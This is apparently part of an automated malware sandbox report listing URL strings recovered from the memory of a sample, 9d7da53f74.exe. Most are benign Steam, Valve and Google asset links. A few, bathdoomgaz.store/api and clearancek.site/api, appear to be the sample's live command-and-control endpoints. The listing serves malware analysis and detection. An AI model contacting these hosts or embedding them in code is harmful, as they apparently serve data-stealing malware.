                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000173E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                                Source: chromecache_161.19.drString found in binary or memory: https://accounts.google.com
                                Source: chromecache_161.19.drString found in binary or memory: https://accounts.google.com/TOS?loc=
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                                Source: chromecache_167.19.drString found in binary or memory: https://apis.google.com/js/api.js
                                Source: chromecache_161.19.drString found in binary or memory: https://apis.google.com/js/rpc:shindig_random.js?onload=credentialservice.postMessage
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
                                Source: 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728178187.0000000001745000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2746326471.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bathdoomgaz.store:443/api
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748086028.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
                                Source: 9d7da53f74.exe, 0000003C.00000002.2748028782.0000000001787000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2748086028.00000000017BA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728178187.0000000001745000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2746326471.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site/apiX
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728178187.0000000001745000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000002.2746326471.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clearancek.site:443/apii
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728003958.00000000017BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000173E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
                                Source: 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/ski
                                Source: 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/fatalerror.css?v=wctRWaBvNt2z&l=engli
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000173E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000173E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000173E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2R
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000002.2522203861.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000C77000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CB000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728178187.000000000173E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=AeTz
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=9yzMGndrVfY4&l=e
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CF000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017CF000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
                                Source: 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017CF000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017CF000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511615380.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521640982.0000000000CE4000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                                Source: 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CF5000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2511547974.0000000000CFA000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 00000015.00000003.2521595516.0000000000D03000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2728084874.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017DC000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727905002.00000000017D0000.00000004.00000020.00020000.00000000.sdmp, 9d7da53f74.exe, 0000003C.00000003.2727955968.00000000017C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
